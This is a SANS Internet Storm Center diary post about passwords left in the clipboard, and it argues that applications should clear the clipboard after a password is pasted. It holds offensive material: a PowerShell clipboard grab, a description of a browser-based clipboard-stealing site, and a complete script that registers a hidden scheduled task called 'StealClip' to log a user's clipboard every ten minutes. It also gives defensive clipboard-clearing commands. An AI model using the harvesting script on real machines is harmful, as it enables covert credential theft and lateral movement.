Archive for September 11th, 2020
Recently I happened to notice that the Cisco AnyConnect VPN client clears the clipboard if you paste a password into it. (Note – if you know and can type any of your passwords in 2020, you should at least partially examine your life choices). Several password managers also do this “right thing” – retaining passwords in the clipboard is a great way for folks to accidentally paste that information into the worst possible place after login (like say into something that’ll post that info into clear text log files), or in the worst case allows it to get stolen post-login.
This got me to thinking, why doesn’t putty do this after password entry, or the Windows RDP client for that matter? Or a myriad of traditional and web apps that take userid/password input for access?
From an attacker’s point of view, the clipboard really is simple to collect in Powershell:
> $clp = Get-Clipboard -Format text
This can be a valuable piece of information to collect in a penetration test, if you happen to have code execution in the user context. If you catch the right person, you are likely to collect the password for some other system – a router, switch or firewall, a hypervisor, or even a mainframe. Or even better, collecting credentials from “standalone” business systems like accounting or shop floor control systems are also pure gold. Pivoting from your existing access to other systems and privilege levels is the whole point of any internal security assessment / penetration test.
You can of course also collect any graphics or files that are in the clipboard, which can sometimes be just as useful.
If you don’t have code execution, you can just ask the Chrome or Opera browser to give up your target’s clipboard by tricking your target person to browse to a specific website – “ClipboardMe” is a decent tool to do this. The main down side is that this tool involves a third party site to collect this information. For some extra fun, this tool can also be used to modify your victim’s clipboard. This this tool also records the IP addresses of your victim(s) – just keep in mind that if those folks are all in the same organization (and on premise), they’ll likely all have the same public IP address. In the screenshot below you see me testing this tool using 3 different browser versions:
While you can technically also collect a remote station’s clipboard using any of the various remote admin tools, in most cases this opens a new session. Since clipboards are tied to sessions, these methods will either collect null values or the clipboard of the station doing the remoting, so in most cases this is a dead end. If you can however get a scheduled task onto your target’s machine, for instance, that can be made to run against your target user. If you can get them to run this short powershell script, a scheduled task will grab their clipboard every 10 minutes (or whatever interval you specify). It does “flash” on the screen, when it runs though – unfortunately if you run it in the background it’s another session so doesn’t work. (If anyone has a decent workaround for this, please drop it in our comment section?)
$argument = “-windowstyle hidden -noninteractive -command `”whoami | out-file -append c:xferexample.txt ; get-clipboard | out-file -append c:xferexample.txt `””
$action = New-ScheduledTaskAction -Execute ‘PowerShell.exe’ -Argument $argument
$u = whoami ; $principal = New-ScheduledTaskPrincipal -UserID $u
$trigger = New-ScheduledTaskTrigger -Once -At 7am -RepetitionDuration (New-TimeSpan -Days 1) -RepetitionInterval (New-TimeSpan -Minutes 10)
$settings = New-ScheduledTaskSettingsSet -Hidden -AsJob -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries
$task = New-ScheduledTask -Action $action -Principal $principal -Trigger $trigger
Register-ScheduledTask “StealClip” -InputObject $task -Force
The other caveat of course is that to do this you have to have that user (and likely the domain) compromised. Remember that this method is all about pivoting to that next (non AD) platform.
From a defensive point of view, the clipboard is also pretty easy to clear, both in PowerShell and otherwise:
From the basic command line you can use the “clip” command to clear the clipboard – any of these commands will work:
break | clip
type nul | clip
echo. > nul | clip
(echo anything to nul will work)
From Powershell it’s not even convoluted, it’s documented:
First, you can still use nul and the clipboard:
echo $null | clip.exe
Yes, this works in powershell for Linux as well, as long as xclip is in the path you can use
echo $null | xclip
In Windows you can use .NET – you’ll see a noticeable pause when this one executes:
Add-type -AssemblyName System.Windows.Forms
Or, you can just use the native Powershell command – by far the preferred approach these days:
This last one also works in Powershell for Linux, again, you need xclip in your path (normally it is)
As expected, this one is documented at https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-clipboard?view=powershell-7
So if it’s that easy to clear, why don’t common apps that accept passwords just do this?
While it’s not well documented, Matt Graeber (Mattifestation) outlines various ETW (Event Tracer for Windows) providers for the clipboard here: https://gist.github.com/mattifestation/04e8299d8bc97ef825affe733310f7bd
Notably, a vendor could monitor for this one during password input, and clear the clipboard if a paste is detected (in other words, clear the clipboard if a password is pasted in, just after it’s used. I’m assuming that this is how most password managers get the job done:
ETW Provider name: Microsoft.Windows.OLE.Clipboard
Provider guid: 3e0e3a92-b00b-4456-9dee-f40aba77f00e
Unfortunately, there isn’t much documentation for this provider past Matt’s “look what I found” listing. So do I have code for this? Nope, sorry I do not. However, if you’ve got any code that uses this provider, please post a link in our comment form, the more we “pile on” to this concept, the fewer excuses our various vendors have not to be responsibly clearing passwords out of clipboards (after they are used of course).
So stay tuned, if someone posts an ETW method to our comments everyone wins. If not, I’ll keep poking at this, you might see a related story in the next couple of weeks.
In the meantime, if you’ve noticed any other apps that clear the clipboard (or don’t clear the clipboard) at the right time, please also let us know in our comment form – this would be a good “list of things to fix”
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.